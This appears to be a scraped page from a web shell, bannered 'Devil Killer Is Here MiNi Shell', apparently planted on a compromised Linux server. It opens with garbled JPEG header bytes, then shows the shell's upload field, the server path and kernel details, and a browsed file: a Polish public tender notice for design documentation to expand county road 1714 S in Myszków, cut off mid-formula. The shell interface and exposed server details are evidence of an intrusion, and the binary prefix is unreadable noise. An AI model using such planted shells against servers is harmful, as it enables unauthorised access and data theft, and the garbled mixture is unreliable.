JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250624/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250624/0029051601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Rozbudowa drogi powiatowej Nr 1714 S na odcinku ul. Sikorskiego<br/>w m. Myszków – wykonanie dokumentacji projektowej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Myszkowie z/s w Żarkach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151405866</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Myszkowska, 59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żarki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pzd.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pzd.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa drogi powiatowej Nr 1714 S na odcinku ul. Sikorskiego<br/>w m. Myszków – wykonanie dokumentacji projektowej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6efba2c-b46a-432f-9cc4-54761206d313</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00290516</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00042614/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Rozbudowa drogi powiatowej nr1714 S na odcinku ul. Sikorskiego w m. Myszków - wykonanie dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzdmyszkow.ezamawiajacy.pl/pn/PZDMYSZ/demand/218050/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 5) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t. j. Dz.<br/>z 2017, poz. 1219 ze zm.), tj. za pomocą elektronicznej Platformy Zamówień Publicznych Powiatowego Zarządu Dróg w Myszkowie pod adresem: https://pzdmyszkow.ezamawiajacy.pl/pn/PZDMYSZ/demand/218050/notice/public/details (dalej zwaną: „Systemem”), do której dostęp możliwy jest również poprzez stronę internetową Zamawiającego www.pzd.com.pl, adres strony internetowej, na której udostępniane będą zamieszczane zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane<br/>z postępowaniem o udzielenie zamówienia: https://pzdmyszkow.ezamawiajacy.pl/pn/PZDMYSZ/demand/218050/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b) komputer klasy PC lub MAC<br/>spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>5. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>6. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie podpisu elektronicznego:<br/>Przeglądarka internetowa Microsoft Edge, Chrome, Firefox w wersji wspieranej przez producenta. Rekomendowaną przeglądarką do<br/>złożenia oferty podpisanej elektronicznie jest Firefox w wersji wpieranej przez producenta. Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java (licencja EPL) w wersji OpenJDK 8 lub<br/>Java (licencja Oracle) w wersji 1.8.0_202 32 bitowej oraz 64 bitowej, pozwalające na przyjmowanie przez użytkownika sesyjnych<br/>plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny platformy eZamawiający<br/>(ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga to uprawnień administracyjnych na komputerze.<br/>Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę funkcjonalności podpisu<br/>elektronicznego w platformie eZamawiający. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji Szafir Host należy<br/>przeładować bieżącą stronę.<br/>Przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą kryptograficzną do komputera.<br/>7. Informacje dotyczące odpowiedniego przygotowania stanowiska znajdą Państwa na stronie:https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów<br/>elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać<br/>zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.<br/>9. Wymagania techniczne oraz organizacyjne, dotyczące komunikacji Zamawiającego z Wykonawcami, zasady funkcjonowania<br/>platformy zakupowej Marketplanet, a także sposób składania ofert oraz zamieszczania przez Wykonawców wszelkich oświadczeń,<br/>wniosków, zawiadomień, oraz informacji określa również Instrukcja dla Wykonawców, dostępna na Platformie Zakupowej<br/>Marketplanet w zakładce „Baza Wiedzy”.<br/>10. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): 17.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor Powiatowego Zarządu Dróg; może Pani/Pan uzyskać informacje o<br/>przetwarzaniu Pani/Pana danych osobowych w siedzibie Powiatowego Zarządu Dróg ul. Myszkowska 59, 42-310 Żarki;<br/>2) inspektorem ochrony danych wyznaczonym przez Dyrektora jest Pani Anna Mstowska, email: iod@pzd.com.pl; tel. (34) 314-83-04;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.: „Rozbudowa drogi powiatowej Nr 1714 S S na odcinku ul. Sikorskiego w m. Myszków – wykonanie dokumentacji projektowej” .<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z 2011<br/>nr 14, poz. 67 z późn. zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie zamówień publicznych;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD/6/342/DP/ST/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia:<br/>Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wraz z uzyskaniem w imieniu<br/>Zamawiającego decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) na rozbudowę drogi<br/>powiatowej nr 1714 S na odcinku ul. Sikorskiego w m. Myszków, Zakres opracowania: od<br/>skrzyżowania z drogą wojewódzką nr 793 do skrzyżowania z ul. 1 Maja oraz ul. Wyszyńskiego,<br/>obejmującej budowę drogi dla pieszych i rowerów, , (wstępne założenia strony zamawiającej<br/>przewidują budowę drogi dla pieszych i rowerów po stronie północno-wschodniej), a także<br/>opracowanie przedmiarów i kosztorysów inwestorskich oraz specyfikacji technicznych niezbędnych<br/>do udzielenia przez PZD zamówienia na realizacje robót budowlanych objętych pozwoleniem w<br/>przedmiocie rozbudowy drogi wraz z pełnieniem nadzoru autorskiego. Zamawiający nie przewiduje<br/>przebudowy skrzyżowania z DW 793. Zakres inwestycji nie obejmuje przebudowy skrzyżowania ul.<br/>Wyszyńskiego, 1-go Maja i Sikorskiego. Dokumentacja techniczna winna uwzględniać zapisy art. 100 Ustawy Pzp<br/>2. Zakres rzeczowy przedmiotu zamówienia:<br/>Wszystkie opracowania projektowe, specyfikacje techniczne, przedmiary, kosztorysy inwestorskie<br/>należy przekazać zamawiającemu w wersji papierowej i elektronicznej. W przypadku dokumentacji<br/>rysunkowej są to pliki z rozszerzeniem pdf i dwg, dokumentacji 2 opisowej (tekstowej) i specyfikacji<br/>– pliki tekstowe. Kosztorysy inwestorskie i przedmiary wymagane są w wersji edytowalnej (arkuszekalkulacyjne lub pliki programów do kosztorysowania umożliwiające otwarcie w programach kosztorysowych).<br/>Dokumentację projektową należy przekazać zamawiającemu w następującej liczbie egzemplarzy:<br/>1)opracowanie koncepcji zagospodarowania terenu wraz z propozycją zastosowanych rozwiązań konstrukcyjno-materiałowych (przekroje podłużne i poprzeczne) i przedłożenie jej do akceptacji Zamawiającego;<br/>2)uzyskanie aktualnych podkładów geodezyjnych (map do celów projektowych) niezbędnych do opracowania projektu budowlanego – do sporządzenia mapy do celów projektowych wykonawca winien wykorzystać materiały wskazane w standardach technicznego wykonania geodezyjnych pomiarów sytuacyjnych i wysokościowych oraz opracowania i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego.<br/>3)aktualne wypisy i wyrysy z mapy ewidencji gruntów w zakresie inwestycji - 1 egz.;<br/>4)opracowanie dokumentacji geodezyjno – prawnej – map podziałowych niezbędnych do uzyskania decyzji ZRID - 4 egz.;<br/>5)uzyskanie decyzji dot. środowiskowych uwarunkowań realizacji przedsięwzięcia;<br/>6)dokumentacja geotechniczna wymagana prawem w zakresie przedmiotu umowy warunkująca uzyskanie decyzji ZRID – 4 egz., (ilość odwiertów do wykonania opinii geotechnicznej przy budowie ścieżki rowerowej określa projektant obiektu budowlanego w porozumieniu z osobą upoważnioną do ustalenia geotechnicznych warunków posadowienia obiektu. Projektant na podstawie kategorii geotechnicznej obiektu i skomplikowania warunków gruntowych ustala zakres badań, w tym liczbę odwiertów).<br/>7)wykonanie projektów: zagospodarowania terenu, architektoniczno-budowlanego, technicznego oraz wykonawczego na przebudowę drogi wraz z odwodnieniem łącznie ze wszystkimi załącznikami, decyzjami, opiniami i uzgodnieniami, warunkującymi otrzymanie decyzji ZRID , zgodnie z obowiązującymi w tym zakresie przepisami, wiedzą i zasadami sztuki budowlanej – 5 egz.;<br/>8)projekt budowlany zgodnie z ustawą Prawo budowlane - 5 egz.;<br/>9)przygotowanie projektu inwentaryzacji zieleni warunkującego otrzymanie pozwolenia na wycinkę drzew kolidujących z inwestycją – 4 egz., ( w przypadku konieczności);<br/>10)opracowanie przedmiarów i kosztorysów inwestorskich niezbędnych do udzielenia przez Powiatowy Zarząd Dróg zamówienia na realizację robót budowlanych objętych decyzją ZRID – 2 egz;<br/>11)specyfikacje techniczne wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, zgodnie z rozdziałem 3 powołanego Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - 4 egz.,<br/>12)opracowanie projektu stałej organizacji ruchu i uzyskanie jego zatwierdzenia - 4 egz,<br/>13)uzyskanie przez Wykonawcę w imieniu Zamawiającego decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) .<br/>14)pełnienie obowiązków nadzoru autorskiego na etapie realizacji robót budowlanych w formie kontaktu elektronicznego oraz wizyt na budowie, obejmujący również wykonanie (w razie zajścia takiej potrzeby) rysunków uzupełniających, projektów zamiennych i dodatkowych.<br/>Koncepcje planu zagospodarowania terenu powinny zawierać naniesione na podkłady mapowe rozwiązania geometrii drogi w tym rozwiązania elementów drogi, zaznaczone elementy<br/>infrastruktury technicznej będące w kolizji ze stanem projektowanym wraz z wstępną propozycją usunięcia tych kolizji, wstępne zaznaczenie linii podziału nieruchomości.<br/>Egzemplarze wymienionych powyżej opracowań muszą być oprawione w sposób uniemożliwiający ich dekompletację . Kompletna dokumentacja musi zawierać również płytę CD zawierającą całość opracowań w formie cyfrowej – wersja nieedytowalna w PDF oraz edytowalna (DOC, DWG, ).<br/>Przewiduje się spotkania robocze na etapie opracowywania dokumentacji projektowej, celem przedstawienia proponowanych rozwiązań koncepcyjnych.<br/>3.Przedmiot zamówienia określony w pkt 2 obejmuje ponadto:<br/>a)wykonanie weryfikacji granic istniejącego pasa drogowego drogi powiatowej Nr 1714 S na długości projektowanego odcinka drogi (przeprowadzenie procedury ustalenia granic ewidencyjnych w przypadku gdy nie są one ustalone).<br/>b)uzyskanie warunków technicznych oraz dokonanie uzgodnień niezbędnych do prawidłowego opracowania dokumentacji projektowej;<br/>c)wykonawca ma obowiązek zapewnić sprawdzenie projektu budowlanego pod względem zgodności z przepisami, w tym techniczno - budowlanymi, przez osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę budowlanego.<br/>d)kserokopie wszelkich uzyskanych warunków, uzgodnień i opinii należy na bieżąco przekazywać do Sekcji Technicznej w Powiatowym Zarządzie Dróg w Myszkowie, w terminach umożliwiających ewentualne skorzystanie z trybu odwoławczego. Natomiast oryginały uzgodnień Wykonawca zobowiązany jest przekazać Zamawiającemu wraz z przekazywaną kompletną dokumentacją ;<br/>e)dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowanej dokumentacji , na każde żądanie Zamawiającego lub Wykonawcy realizującego roboty na podstawie tej dokumentacji, bez dodatkowych roszczeń finansowych;<br/>f)sprawowanie nadzoru autorskiego na żądanie Zamawiającego lub właściwego organu w zakresie:<br/>- stwierdzania w toku wykonania robót budowlanych zgodności realizacji z projektem,<br/>- uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.<br/>● Nadzór autorski sprawowany będzie nieodpłatnie w okresie wykonywania na podstawie opracowanej dokumentacji projektowej robót budowlanych, nie dłużej jednak niż do zakończenia robót budowlanych, licząc do dnia protokólarnego bezusterkowego odbioru robót budowlanych przez Zamawiającego.<br/>● Wykonawca przeniesie prawa autorskie i zależne do dokumentacji, a ich zakres określi zawarta Umowa.<br/>● Oryginały uzgodnień Wykonawca zobowiązany jest przekazać Zamawiającemu z pierwszym egzemplarzem dokumentacji.<br/>● W przypadku, gdy na odcinku objętym przedmiotem zamówienia znajdują się urządzenia infrastruktury technicznej niezwiązane z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, oraz gdy zajdzie konieczność ich przeprojektowania Wykonawca zobligowany jest zapewnić obsługę odpowiedniego projektanta branżowego.<br/>● W przypadku możliwości uzyskania odstępstwa od budowy kanału technologicznego Wykonawca zobowiązany jest uzyskać takie odstępstwo.<br/>● Zamawiający na każdym etapie sporządzania dokumentacji może wnieść uwagi do przedłożonych przez Wykonawcę rozwiązań. Wprowadzenie zmian nie może być podstawą do roszczeń Wykonawcy o dodatkowe wynagrodzenie, z wyjątkiem sytuacji gdy Zamawiający wprowadzi zmiany po ostatecznym uzgodnieniu rozwiązań projektowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oraz ich znaczeniem:<br/>L.p. Kryterium Znaczenie kryterium<br/>(w %) Liczba możliwych<br/>do uzyskania punktów<br/>1. Cena łączna brutto realizacji zamówienia<br/>60<br/>60<br/>2. Doświadczenie osoby/osób wyznaczonych do realizacji zamówienia, które będą wykonywały dokumentację projektową<br/>40<br/>40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/>Cena łączna brutto realizacji zamówienia – 60% (C).<br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max. 60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = 